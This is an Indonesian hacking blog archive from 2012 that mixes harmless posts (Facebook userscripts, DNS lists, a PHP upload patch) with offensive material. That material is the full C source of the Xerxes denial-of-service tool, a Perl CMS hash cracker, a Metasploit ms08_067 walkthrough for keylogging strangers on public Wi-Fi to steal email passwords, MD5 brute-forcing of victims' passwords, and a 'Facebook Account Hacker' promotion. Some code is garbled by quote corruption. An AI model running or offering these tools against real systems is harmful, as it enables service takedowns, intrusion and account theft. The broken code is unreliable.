Monday, December 31, 2012

0 Daftar script2 Auto (Facebook)

9:11 PM Under From Unknown
[0 Comment]
Kali ini saya akan membagikan kumpulan script yang berguna untuk memaksimalkan penggunaan facebook. Script ini saya kumpulkan dari userscripts.org
Untuk menggunakan script-script di bawah, anda harus menggunakan browser firefox dan telah meng-install greasemonkey.

Tutorial cara install greasemonkey.
1. Buka addons.mozilla.org/id/firefox/addon/greasemonkey/
2. Klik Add to Firefox
3. Tunggu download sampai selesai
4. Setelah download selesai, maka akan muncul pemberitahuan dan ada pilihan, klik lah Restart Now
5. Selesai...

Tutorial cara install script di userscripts.org
1. Pilih script yang ingin anda download di bawah ini
2. Klik Install (ada pada pojok kanan atas)
3. Nanti akan muncul sebuah window kecil, lalu klik Install
4. Selesai, dan refresh facebook.

Berikut adalah daftarnya, silakan di download.
Download FB Album Mod
Fungsi dari script ini adalah untuk mendownload Album Facebook secara instan dengan mudah.

Facebook Ad Remover
Script ini berfungsi untuk menghilangkan iklan di Facebook. Yang tidak suka iklan dan merasa terganggu dengan iklan di Facebook, bisa di install script ini.

Facebook Old Chat Sidebar
Untuk menghilangkan facebook new chat sidebar dengan yang lama.

Facebook Autolike
Script ini berfungsi untuk menyukai/like status facebook teman secara otomatis dengan sekali klik. [Report If Not Working]

Social Fixer
Merupakan script yang membuat facebook menjadi lebih baik, banyak fitur-fitur yang berguna untuk facebook pada script ini. [Recommended To Install]

Facebook Autopoke
Sesuai nama scriptnya Facebook autopoke, script ini berfungsi untuk mencolek teman-teman anda di facebook secara otomatis. Jangan terlalu sering menggunakan autopoke, nanti akun facebook anda akan di suspend.

Facebook Timeline Cleaner
Cleaner... Dari namanya juga pembersih. Script ini berfungsi untuk membersihkan Timeline/Kronologi pada profile facebook anda.

Delete Facebook Friends
Script ini akan memudahkan anda untuk menghapus teman di facebook, bahkan anda dapat menghapus semua teman di facebook sekaligus.

Facebook Hide Offline Friends Button
Berfungsi untuk menyembunyikan teman yang offline pada chat sidebar.

Facebook: InviteThemAll
Berfungsi untuk mengundang semua orang ke dalam acara yang anda buat di facebook tanpa memilih satu persatu profile facebook.

Facebook: Remove 'Recent Activity'
Berfungsi untuk menghilangkan aktivitas terbaru pada profile anda.

Facebook Sunda
Khusus untuk orang sunda, script ini berfungsi untuk merubah bahasa di facebook menjadi bahasa sunda.

Untuk keterangan lebih lanjut pada script di atas, silakan buka halaman script tersebut dan baca infonya.
Sebenarnya pake google chrome juga bisa, tapi tidak semua script berjalan dengan baik. Jika anda ingin menggunakan chrome, install dulu tampermonkey.
Script lain dapat di download di userscripts.org/tags/facebook
Semoga berguna...
Read More »

Tuesday, December 25, 2012

0 DNS Pilihan masyarakat (Cyber)

6:22 AM Under From Unknown
[0 Comment]
Pada postingan kali ini ane mau ngebahas hal yang sudah familiar buat sobat-sobat, yaitu DNS. Bagi yang belum tahu bisa lihat sendiri di sini Habis browsing ane nemuin settingan manual gprs resmi dari Opera Mini yang tentunya karena pihak Opera Mini telah bekerja sama dengan Operator-operator seluruh dunia, termasuk Indonesia. Setelah ane coba ternyata cukup maknyus DNS nya.
OK, berikut ini Operator yang ane dapat data DNS-nya dari Opera Mini, antara lain :

- Excelcomindo (XL)
primary DNS
202.152.254.245
secondary DNS
202.152.254.246

- Indosat
primary DNS
202.155.46.66
secondary DNS
202.155.46.77

- Telkomsel
primary DNS
202.152.0.2
secondary DNS
202.155.14.251 atau 202.155.14.253

- Three
untuk three versi Indonesia opmin belum menyediakan DNS resminya, tapi pihak opmin menyediakan DNS three versi Australia.
primary DNS
202.124.68.130
secondary DNS
202.124.76.66


Berikut Daftar DNS yang Stabil Dan Cepat
DNS Speedy :
125.160.10.2 (ACEH)
203.130.206.250(MEDAN)
203.130.193.74(BATAM)
202.134.0.155(JKT)
203.130.196.5(JKT)
202.134.0.61(JKT)
222.124.204.34(BANDUNG)
202.134.1.10(SBY)
202.134.1.7(SBY)
203.130.209.242(BLKPPN)
203.130.208.18 (Semarang)
Silahkan Pilih DNS Sesuai Dengan Daerah Mu..

Dan Ini DNS umum :


Open DNS
208.67.222.222
208.67.220.220 
DNS Google
8.8.8.8
8.8.4.4 
DNS ScrubIt
67.138.54.100
207.225.209.66 
dnsadvantage
156.154.70.1
156.154.71.1
209.244.0.3
209.244.0.4 
DNS OpenNIC
AU 58.6.115.42
AU 58.6.115.43
AU 119.31.230.42
BR 200.252.98.162
DE 217.79.186.148
FR 82.229.244.191
US 216.87.84.211
US 2002:d857:54d2:2:20e:2eff:fe63:d4a9
US 2001:470:1f07:38b::1
US 66.244.95.20
US 2001:470:1f10:c6::2
141.211.125.17
141.211.144.17
198.77.116.8
198.77.116.12
198.77.116.221
198.77.116.223
198.77.116.225
198.77.116.227
205.171.2.65
205.171.3.65
141.211.144.15
===========
202.138.224.2
202.155.0.155
202.146.255.5
===========
202.152.254.246
202.152.254.245
202.154.1.2
============
202.249.24.65
167.205.23.1
167.205.22.123
167.205.30.114
===========
222.124.22.18
===========
202.149.82.25
202.149.82.29
===========
DNS Di atas Adalah DNS yang Telah Digunakan Oleh Seluruh Pengguna Internet.
Dan Admin Memakai Salah Satu DNS itu Yaitu DNS Google : 8.8.8.8 Dan 8.8.4.4 DNS Google Ini Sangat Stabil Dan Sangat Cepat ! Makan Nya Saya Beralih DNS ke DN Google :)

Oke Sekian Dari Informasi Saya :)
Read More »

Wednesday, December 19, 2012

12:26 AM Under From Unknown
[0 Comment]
Welcome to Facebook Account Hacker!

Your one stop destination to hack anyone on Facebook.


We are currently the #1 site in the Internet to provide this service for free and at amazing speeds and success rate. Don't believe us? See the video below and see for yourself how you can hack anyone on Facebook within max 10-30 minutes.

Go To link >>> HACK NOW!
Read More »

Friday, December 14, 2012

0 Bypass PHP Arbitrary File Upload

6:04 PM Under From Unknown
[0 Comment]
Ok disana patchingnya emang ga terlalu bagus…
Karena filetype bisa di manipulasi..
Bukan dengan merename shell.jpg.php tetapi dengan memanipulasi “header” file
Cara membypassnya adalah sebagai berikut:
Review codenya dulu

Kalo kita coba di HTTP response server kira-kira dapat begini dengan code diatas:

Ok kita liat… ada footprint yang keren disana..
Gimana kalo kita manipulasi upload kita supaya http server membaca script kita sebagai images/gif
Simple code exploitnya..

Coba kita liat apakah sukses exploit kita..

Hohoohohoho…
Untuk patchingnya:
Kita perketat aja patchingnya dengan mengganti code diatas dengan code berikut

Happy Patching..
Read More »

0 DDOS Tools: Xerxes DOS Tools

6:04 PM Under From Unknown
[0 Comment]
Berikut ini adalah source code Xerxes DOS (DDOS Tools) yang digunakan untuk melakukan DOS terhadap server-server. Digunakan oleh The Jester untuk takedown situs-situs, langsung aja ini source codenya:
/* XerXes – Most powerful dos tool – THN (http://pastebin.com/aWZMbjSU) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int make_socket(char *host, char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r;
//    fprintf(stderr, “[Connecting -> %s:%s\n", host, port);
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
        exit(0);
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    if(p == NULL) {
        if(servinfo)
            freeaddrinfo(servinfo);
        fprintf(stderr, "No connection could be made\n");
        exit(0);
    }
    if(servinfo)
        freeaddrinfo(servinfo);
    fprintf(stderr, "[Connected -> %s:%s]\n”, host, port);
    return sock;
}
void broke(int s) {
    // do nothing
}
#define CONNECTIONS 8
#define THREADS 48
void attack(char *host, char *port, int id) {
    int sockets[CONNECTIONS];
    int x, g=1, r;
    for(x=0; x!= CONNECTIONS; x++)
        sockets[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
        for(x=0; x != CONNECTIONS; x++) {
            if(sockets[x] == 0)
                sockets[x] = make_socket(host, port);
            r=write(sockets[x], “\0″, 1);
            if(r == -1) {
                close(sockets[x]);
                sockets[x] = make_socket(host, port);
            } else
//                fprintf(stderr, “Socket[%i->%i] -> %i\n”, x, sockets[x], r);
            fprintf(stderr, “[%i: Voly Sent]\n”, id);
        }
        fprintf(stderr, “[%i: Voly Sent]\n”, id);
        usleep(300000);
    }
}
void cycle_identity() {
    int r;
    int socket = make_socket(“localhost”, “9050″);
    write(socket, “AUTHENTICATE \”\”\n”, 16);
    while(1) {
        r=write(socket, “signal NEWNYM\n\x00″, 16);
        fprintf(stderr, “[%i: cycle_identity -> signal NEWNYM\n", r);
        usleep(300000);
    }
}
int main(int argc, char **argv) {
    int x;
    if(argc !=3)
        cycle_identity();
    for(x=0; x != THREADS; x++) {
        if(fork())
            attack(argv[1], argv[2], x);
        usleep(200000);
    }
    getc(stdin);
    return 0;
}

Video Xerxes Dos

Semoga informasi ini bermanfaat sebagai pembelajaran yang lebih baik.
Read More »

0 Multiple CMS Hash Cracker

6:04 PM Under From Unknown
[0 Comment]
Berikut ini adalah source untuk MD5/SHA-1 Cracker yang dibuat untuk Crack Content Management System Hash seperti Joomla, WordPress, Drupal, Dsb. Jadi bisa mempermudah pencarian hash, langsung aja deh :)
#!usr/bin/perl
use Digest::MD5 qw(md5_hex);
use Digest::SHA1 qw(sha1_hex);
# Author: localh0t
# Date: 09/06/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# Help
if(!$ARGV[7])
{
print “\n\n###########################################”;
print “\n# Multi CMS Hash Cracker v0.1 by localh0t #”;
print “\n###########################################”;
print “\n\nUse: perl $0 -d [WORLDLIST FOLDER] -h [MD5 | SHA-1 HASH] -s [SALT | USERNAME] -c [CMS]\n”;
print “Example: perl $0 -d /home/localh0t/wordlists/ -h caef8544a8e65e23f67ab844d4866e8d -s uZ*qX -c IPB\n”;
print “Example: perl $0 -d /home/localh0t/wordlists/ -h dc4a27b25e3f780b89c165f931d6f85d5bd6e33e -s Administrator -c SMF\n\n”;
print “Note: Worlists must end with .txt or .lst (or any extension)\n\n”;
print “Support:\n========\n”;
print “VB : md5_hex(md5_hex(password).salt) | (vBulletin)\n”;
print “SMF : sha1_hex(user.password) | (Simple Machines Forum)\n”;
print “IPB : md5_hex(md5_hex(salt).md5_hex(password)) | (Invision Power Board)\n”;
print “JOOMLA : md5_hex(password.salt) | (Joomla 1.x)\n\n”;
exit(0);
}
# Functions
sub ipb_cracker{
my $hash = shift;
my $salt = shift;
my $dir = shift;
foreach $file (@FILES) {
open(DICT,” print “[!] Using $file…\n”;
foreach $password() {
$password=~s/\s|\n//;
chomp($password);
$cracked = md5_hex(md5_hex($salt).md5_hex($password));
if ($cracked eq $hash) {
return “[+] Hash cracked !: $password\n\n”;
}
}
print “[!] Nothing found with $file…\n\n”;
}
return “\n[-] Password not found\n\n”;
}
sub vb_cracker{
my $hash = shift;
my $salt = shift;
my $dir = shift;
foreach $file (@FILES) {
open(DICT,” print “[!] Using $file…\n”;
foreach $password() {
$password=~s/\s|\n//;
chomp($password);
$cracked = md5_hex(md5_hex($password).$salt);
if ($cracked eq $hash) {
return “[+] Hash cracked !: $password\n\n”;
}
}
print “[!] Nothing found with $file…\n\n”;
}
return “\n[-] Password not found\n\n”;
}
sub smf_cracker{
my $hash = shift;
my $user = shift;
my $dir = shift;
foreach $file (@FILES) {
open(DICT,” print “[!] Using $file…\n”;
foreach $password() {
$password=~s/\s|\n//;
chomp($password);
$cracked = sha1_hex($user.$password);
if ($cracked eq $hash) {
return “[+] Hash cracked !: $password\n\n”;
}
}
print “[!] Nothing found with $file…\n\n”;
}
return “\n[-] Password not found\n\n”;
}
sub joomla_cracker{
my $hash = shift;
my $salt = shift;
my $dir = shift;
foreach $file (@FILES) {
open(DICT,” print “[!] Using $file…\n”;
foreach $password() {
$password=~s/\s|\n//;
chomp($password);
$cracked = md5_hex($password.$salt);
if ($cracked eq $hash) {
return “[+] Hash cracked !: $password\n\n”;
}
}
print “[!] Nothing found with $file…\n\n”;
}
return “\n[-] Password not found\n\n”;
}
my ($dir, $hash, $salt, $cms, $arg);
foreach $loop (@ARGV) {
for ($loop) {
/^-d$/ and do { $dir = $ARGV[($arg+1)]; last; };
/^-h$/ and do { $hash = $ARGV[($arg+1)]; last; };
/^-s$/ and do { $salt = $ARGV[($arg+1)]; last; };
/^-c$/ and do { $cms = $ARGV[($arg+1)]; last; };
}
$arg++;
}
# Main
print “\n[!] Cracking $hash with $salt as username/salt…\n\n”;
opendir(DIR, $dir) || die “\n[-] Folder not found\n\n”;
while($file = readdir(DIR)) {
if ($file ne ‘.’ and $file ne ‘..’) {
$FILES[$clean] = $file;
$clean++;
}
}
for ($cms) {
/^IPB$/ and do { $result = &ipb_cracker($hash,$salt,$dir); last; };
/^VB$/ and do { $result = &vb_cracker($hash,$salt,$dir); last; };
/^SMF$/ and do { $result = &smf_cracker($hash,$salt,$dir); last; };
/^JOOMLA$/ and do { $result = &joomla_cracker($hash,$salt,$dir); last; };
/^.$/ and do { print “[-] CMS not available\n”; exit(0); last; };
}
print $result;
# Exit
close(DICT);
closedir(DIR);
exit(0);
__END__
Bagaimana Penggunaannya? Berikut Petunjuknya:
  1. Install Perl Di Komputer Anda, Dengan Mendownload Perl. Untuk Linux Biasanya Sudah Terinstall, Di Windows Silakan Download Disini: http://www.activestate.com/activeperl/downloads
  2. Simpan File Tersebut “cmsdir.pl
  3. Ikuti Langkah Berikut:

Silakan Download Tools / Source Code:

Read More »

0 PHP Arbitrary File Upload Simple Patching

6:04 PM Under From Unknown
[0 Comment]
Saya akan membahas tentang cara simple mempatch PHP Arbitrary File Upload.
PHP Arbitary File Upload Patch
Kebanyakan website yang vuln diupload memiliki garis besar seperti ini:
Contoh simple upload.php file upload.
1
2
3
4
5
6
7
8
9
<span style="color: #0000ff;">&lt;?php
$uploaddir = 'uploads/'; // Relative path under webroot
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?&gt;</span>
Contoh form yang dipake dalam file index untuk upload:
1
2
3
4
<span style="color: #0000ff;">&lt;form name="upload" action="upload.php" method="POST" ENCTYPE="multipart/formdata"&gt;
Select the file to upload: &lt;input type="file" name="userfile"&gt;
&lt;input type="submit" name="upload" value="upload"&gt;
&lt;/form&gt;</span>
Disini tidak ada code yang memfilter upload filetype.
Jadi kita bisa langsung saja upload: shell.php
Patching yg bisa dilakukan adalah menambahkan filter filetype dalam script upload.php
Contohnya:
1
2
3
4
5
6
7
8
9
10
11
12
13
<span style="color: #0000ff;">&lt;?php
if($_FILES['userfile']['type'] != "image/gif") {
echo "Sorry, we only allow uploading GIF images";
exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?&gt;</span>
Untuk “images/gif” bisa diganti dengan “images/jpg” dll…
Kita liat backgound request uploadnya
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<span style="color: #0000ff;">POST /upload.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data;
Content-Length: 156
Content-Disposition: form-data; name="userfile"; filename="shell.php"
...
...
-
HTTP/1.1 200 OK
Date: Thu, 31 May 2007 13:54:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.2-pl6-gentoo
Connection: close
Content-Type: text/html
Sorry, we only allow uploading GIF images</span>
Hehehe..
Happy Patching..
Read More »

0 Decrypt MD5 Dengan CainAbel

5:58 PM Under From Unknown
[0 Comment]
Adakalanya ketika kita berhasil mendapatkan password korban yang kita hack, password tersebut masih dalam bentuk yang terenkripsi. Dan tutorial ini akan membahas tentang cara menggunakan Cainabel sebagai MD5 Decrypt, yaitu cara untuk mengetahui password yang dienkripsi dengan MD5 Encryption. Dimana Cainabel kita gunakan untuk MD5 Bruteforce. Jika anda belum punya Cainabel, anda bisa DOWNLOAD DISINI.
Dan berikut ini adalah langkah demi langkahnya :
Pertama
Buka program Cainabel, lalu buka tab menu Cracker, dan pilih MD5 Hashes.
Kedua
Klik tombol Add to list, yang berbentuk tanda plus seperti iniCara menggunakan Cainable
Ketiga
Setelah anda klik tombol plus tadi, maka akan muncul kotak input yang meminta anda untuk memasukkan password MD5 yang ingin anda decrypt. Untuk percobaan, mari kita decrypt password ini 87040259bc02544d3e3c71f87ca94d32. Password tersebut bila didecrypt hasilnya adalah hedizone. Masukkan password tersebut dalam input box, lalu klik OK.
Ketiga
Setelah anda klik tombol plus tadi, maka akan muncul kotak input yang meminta anda untuk memasukkan password MD5 yang ingin anda decrypt. Untuk percobaan, mari kita decrypt password ini 87040259bc02544d3e3c71f87ca94d32. Password tersebut bila didecrypt hasilnya adalah hedizone. Masukkan password tersebut dalam input box, lalu klik OK. 
Cara menggunakan Cainable
Keempat
Klik kanan pada list password yang akan didecrypt, dan pilih Brute-Force Attack.
Cara menggunakan Cainable
Kelima
Selanjutnya akan muncul kotak Brute-Force Attack. Langsung anda klik Start, dan proses decrypt akan berjalan. Lama proses ini tergantung dari panjang dan kerumitan password yang didecrypt. Semakin panjang dan rumit sebuah password yang akan didecrypt, semakin lama pula proses Bruteforce decryptnya berjalan. 
Cara menggunakan Cainable
Keenam
Jika proses decrypt sudah selesai, maka passwordnya akan terlihat seperti pada gambar berikut.
Cara menggunakan Cainable
Jadi begitulah cara menggunakan Cainabel sebagai MD5 Decrypt. Bagaimana? Mudah kan :) . Cuma nunggu prosesnya lama, butuh kesabaran. Selain untuk decrypt md5, Cainable juga bisa digunakan untuk mendecrypt hhash yang lainnya. Silahkan anda coba-coba sendiri.
Selamat berjuang mendecrypt password.

Jangan pernah lelah untuk belajar, karena dunia kita adalah dunia berfikir tanpa batas yang dituntut untuk terus belajar dan terus belajar.

Bukankah para Master itu dulunya seperti kita semua? Berawal dari Newbie :)
Read More »

0 Keylogger Dengan Metasploit

5:58 PM Under From Unknown
[0 Comment]
Iseng-iseng again.. mengapa judulnya kayak gini (Merekam ketukan keyboard target tanpa menyentuh komputernya – keylogger canggih), iyah betul judulnya sesuai kok sama kenyataannya,,yang biasanya ente kalo mau ngerjain temen buat ngerekam keyboard target pake keyloger dengan harapan si korban masukin email dan lain sebagainya.. Ente mondar mandir berkali kali kekomputer target buat naro keylogger dengan berbagai macam alesan,,entah numpang mindahin file or apalah buat naro sebuah keylogger aja,,alesan yang pertama bos minjem laptop luh bos buat mindahin data-data, abis itu seminggu kemudian balik lagi pake alesan bos data-data w kemaren ketinggalan dilaptop luh. Gw minjem lagi dong dengan harapan password email or facebook temennya udah kecantol di jebakan keylogger miliknya,,tapi tutorial kali ini, gak perlu repot2 kok, gak perlu mondar mandir dua kali..Tutorial kali ini kita exploit rekaman keyboard tanpa menyentuh laptop korbannya…dengan modal kita tau ipaddress korban aja udah beres,,Linux gituh Lhhhooooooo…
OK deh langsung aja, tanpa basa basi..
Peralatannya adalah :
  1. Angry IP Scanner (Buat scanning ipaddress)
  2. Nmap (Buat nyecan Port2 yg kebuka n nyecen OS korban sekalian)
  3. Metasploit (Sangat penting buat exploitnya)
1. Pertama buka angryipscanner, pilih netmasknya yg 24 ajee,,pokoknya disesuain aja sama lokasinya dimana,,hahhaha,,kalo sekedar hostpot area area doang yg model model kayak di mol mol mah 24 ajeee…lalu liat ipaddress kita dilaptop kita..dan lakukan scanning dari 0 s/d 255, maka akan muncul gambar kayak gini :
nah gambar diatas itu yg warna biru berati komputernya lagi idup alias lagi nyala.

2. Buka nmap dan lakukan scanning port dan OS korban dengan perintah sudo nmap -O ipkorban, seperti gambar berikut:
liat deh ituhh,,ternyata doi pake windows XP,,hehhehe,,hajar bleeeehhhhhh….sampe keakar2nya bikin intall ulang dalem hitungan detik…Ouuppppsss jangan dungggsss, kan ini tutorialnya tentang ngerekam keyboard buat dapetin password,,hhehheh,,,Oiya yaaaa…lanjuttt blleeehhh..

3. Mulailah exploit, buka applikasinya msfgui,,tekan keyboard Alt+F2 dan ketik “msfgui” setelah kebuka dan Start, pilih “ms08_067_netapi” di Exploit>windows>smb> , seperti gambar berikut ini:

4. Maka akan keluar jendela pilihan OS targetnya, pilihlah “Automatic Targeting”, seperti gambar berikut ini:

5. Lalu scrool kebawah dan pilih “Meterpreter>bind_tcp” , seperti gambar berikut ini:

6. Lalu scrool kebawah lagi dan masukan ipaddress target di kolom “RHOST” , seperti gambar berikut ini:
Lalu scrool ke paling bawah ada tombol, Exploit, tekan aja ituh,,,

7. Maka akan keluar jendela seperti ini di tab “Session”, seperti gambar dibawah ini:

8. Lalu klik kanan itu dan pilih Monitor>Start KeyLogger, seperti gambar dibawah ini:

9. Maka akan keluar path tempat penyimpanan log nya berupa format “txt” dikomputer kita, seperti gambar berikut ini:
coba perhatikan yg Keystrokes being saved to bla bla bla,,itu adalah nama path lokasi penyimpanan lognya dikomputer pinguin kita. dan liat bacaan Recording,,itu berati ketukan keyboard korban sudah mulai di rekam oleh metasploit kita..hhehehe..Saatnya kita tungguin ajaaa dah,,setelah lama, kita tunggu, n udah gak sabar, setelah beberapa menit kita buka ajjeee tuh filenya, seperti gambar berikut ini:

10. Udah gak sabar nih, langsung aja buka,,lalu lakukan searching dengan menekan tombol Ctrl+F dengan memasukkan kata2 kunci yg biasanya bau bau enak, seperti yahoo.com, yahoo.co.id, gmail.com , ymail.com, com, dll, maka akan keluar Insya Allah kayak gini broo:

Kayaknya kena tuh,,,hehhehehe,,,biasanya kalo korban ngetik di keyboard Ctrl maka di file lognya <Ctrl>, kalo dia mencet Enter <Return>, kalo mencet tab <Tab> dan lain sebagainya…
OK kelar deh,,ya kan bener kan gak perlu mondar mandir nyentuh komputer korbannya buat ngedapetin sesuatu yg ente mau,,,hhhwhwhhw,,pake metasploit lebih sloooowww,,sambil ngopi+ngeroko filter juga OK,,gak perlu tergesah gesah dengan tampang pucat mbrunyammm,,,hwhhhwh,,,OK lah kalo bgitu ane pamitan dulu, n tunggu exploit-exploit berikutnya dari si logo PINGUIN….
Read More »

0 Cracking Software: MessageBox Sederhana

5:58 PM Under From Unknown
[0 Comment]
HackINTRO
Artikel ini ditujukan untuk semua level pembaca, tidak ada perbedaan, Leet, Newbie, melintasi semua batas, NO-SARA, We’re the one for equality.. Punk Rock, oi-oi! :D Sebelumnya Saya ingin menyampaikan salam hormat dan persahabatan kepada seluruh rekan-rekan Hacker yang pernah mengenal Saya di Indonesia, terutama rekan-rekan veteran h4xx0r yang mengagumkan.. :D
Pernahkah bertemu dengan software trial alias shareware atau mempergunakan shareware? Shareware adalah program trial (tidak gratis) yang memiliki keterbatasan dan mengharuskan user untuk membeli atau membayar software tersebut sebelum bisa dipergunakan secara penuh atau tanpa batasan. Artikel ini akan mencoba membahas hal paling dasar dari skema proteksi software berbayar (shareware). Salah satu skema shareware yang cukup terkenal adalah Nag atau kotak dialog yang menampilkan pesan tentang status software, apakah sudah dibeli (Registered) atau masih trial (Unregistered). Sebenarnya artikel ini merupakan modifikasi dari salah satu materi seminar Saya di pertengahan tahun 2009 untuk instansi pendidikan jurusan Teknik Informatika, dimana saat itu Saya diminta memperagakan demo cracking sederhana yang sering dijumpai pada skema shareware.
Artikel ini TIDAK bertujuan untuk mengajarkan cara mencuri ataupun membajak software berbayar, namun lebih mengutamakan kepada pemahaman tentang kerawanan sebuah sistem. Tidak satupun target yang dipergunakan sebagai kelinci percobaan pada artikel ini yang berstatus shareware milik pihak lain. Target yang disediakan adalah software buatan Saya pribadi, jadi tidak ada pihak lain yang dirugikan disini kecuali Saya (Waktu istirahat dirumah seusai kerja terpangkas karena menulis artikel ini dan uang pribadi Saya terpangkas karena dipergunakan untuk membayar koneksi broadband internet melakukan download compiler Assembler dan posting artikel..)
Kepada seluruh “Prankster” alias “Not Action Talk Only” yang selalu negatif dalam menilai aktifitas Hacker, sebaiknya baca terlebih dahulu sebelum menilai.. kenapa malah kalian yang ribut? Padahal yang terpakai waktu, tenaga dan uang pribadi Saya, bukan milik kalian! Sirik tanda tak mampu..

Tool On Demand :
  1. Ollydbg, bisa Anda dapatkan di www.ollydbg.de.
  2. File target “Target.exe” telah disertakan bersama artikel ini atau kunjungi website Saya di www.mrhpx.co.nr (Saya membuatnya secara pribadi untuk menghindari pelanggaran UU Hak cipta dan DMCA yang menyebalkan!)
  3. Pengetahuan tentang Assembly (Tidak tahu sama sekali juga tidak masalah :D )
  4. Red Palmall.. (Untuk motivasi dan Inspirasi.. Serta membantu meningkatkan pendapatan pajak pemerintah Republik Indonesia :D )
  5. Padi – Tempat Terakhir.mp3.. (Lagu yang bagus, untuk mengupdate database musik dan jiwa, ingat jangan membeli bajakan! :D )

Target Description
Karakter target seperti yang telah disebutkan diatas adalah menampilkan Nagscreen atau MessageBox di awal software dijalankan. Untuk menghilangkan tampilan Nagscreen MessageBox, user harus melakukan pembelian.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot NagScreen
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Tugas yang harus dikerjakan disini adalah menonaktifkan MessageBox atau kotak dialog pesan. Sehingga software tidak akan menampilkan MessageBox lagi diawal software dijalankan untuk selamanya.
Tidak ada hal yang lebih menyenangkan di bidang keamanan komputer selain melakukan analisa Reverse Engineering file Binary. Rekan-rekan yang penasaran terhadap isu Deface Website, Rootkit, Software Cracking, Penetrasi Sistem, DDoS, Buffer Overflow dan sejenisnya wajib mempelajari Reverse Engineering. Dari bidang inilah semua isu security berasal, baik mengenai Exploit, Vulnerable atau Bugs Sistem dan lain sebagainya. Sebelum membaca lebih lanjut Saya sangat merekomendasikan kepada Anda untuk membaca artikel Saya yang berjudul “Tutorial Injeksi Executable – Bagian 1 : MessageBox” dan “Tutorial Injeksi Executable-Bagian 2-Splash Screen” kedua artikel tersebut bisa membantu Anda dalam memahami dasar Reverse Engineering jika Anda menemui kesulitan saat membaca artikel ini.

The Beginning
Jalankan Ollydbg kemudian load “Target.exe”.. Tampilan akan terlihat seperti pada Screenshot dibawah ini. Khusus bagi Anda yang termasuk dalam tingkatan bukan newbie, disini Anda tentu sudah bisa membaca Entry Point (EP) dan menentukan langkah untuk mematahkan proteksi.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot Load Target
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
CATATAN : Address yang terdapat pada komputer Anda mungkin berbeda dengan yang terdapat pada artikel ini. Selalu ikuti Address pada komputer Anda.
Pada layar utama, Klik kanan->Search for->All referenced text strings. Setelah itu Anda akan berada pada jendela baru yang menampilkan bermacam-macam string, coba cari dan arahkan mouse Anda pada string yang bertuliskan “Software SHAREWARE KEREN #1 di Dunia dan Alam Bawah Sadar”, lalu klik ganda atau tekan enter.
Anda akan kembali lagi menuju jendela utama, coba Anda arahkan mouse satu baris ke atas tepatnya alamat 1314156F di instruksi “6A 24” atau “PUSH 24”. Anda akan menjumpai tanda panah berwarna merah “Conditional Jump” atau “Lompatan Dengan Memperhatikan Kondisi” yang berasal dari alamat 13141533 “EB 3A”.
MessageBox (Win32 Programmer’s Reference)
Fungsi MessageBox menciptakan, menampilkan dan mengoperasikan sebuah dialog pesan. Dialog pesan berisi suatu gambaran-aplikasi pesan dan judul, ditambah berbagai kombinasi dari tombol tekan dan ikon yang dikenal.
Info
Windows NT : Yes
Win95 : Yes
Win32s : Yes
Import Library : user32.lib
Header File : winuser.h
Unicode : WinNT; Win95
Platform Notes : None
Syntax
int MessageBox(
HWND hWnd, // handle of owner window
LPCTSTR lpText, // address of text in message box
LPCTSTR lpCaption, // address of title of message box
UINT uType // style of message box
);
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot Assembly Code
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Logical, Analyze, ATTACK.. CRACKadabra!™
Saat software dijalankan akan langsung menuju ke alamat 13141533 “EB 3A”. Yang berfungsi untuk menjalankan instruksi di alamat 1314156F “PUSH 24” yang berisi Nagscreen atau MessageBox. Di alamat 13141586 “CMP EAX,7” software melakukan pemeriksaan, yaitu :
  1. Jika user menekan “No” alamat 13141589 “JE SHORT TARGET.1314158D” maka kode akan mendarat di alamat 1314158D “PUSH 0” yang akan menyebabkan software exit.
  2. Sedangkan jika user menekan “Yes” alamat 1314158B “JMP SHORT TARGET.13141594” maka kode akan mendarat di alamat 13141594 “PUSH 0” yang akan menyebabkan software berjalan secara normal.
Dari data analisa diatas, maka bisa disimpulkan beberapa metode yang bisa dipakai untuk menonaktifkan Nagscreen atau MessageBox. Saya bukan tipe Hacker yang pelit ataupun tipe Hacker bego dan matre yang suka menjual teknik Hacker yang cepat basi, seperti kebanyakan buku Hacker mahal yang sering Anda temukan di toko buku online dan offline di sekitar Anda. Saya tidak ingin hanya memberikan satu metode saja, Saya lebih menyukai memberi Anda beberapa metode dalam pemecahan permasalahan. Orang yang hanya memiliki satu metode strategi dalam menghadapi lawan adalah orang yang cukup konyol. Beberapa metode yang bisa dipergunakan, yaitu :
  1. Metode 1 – JUMP
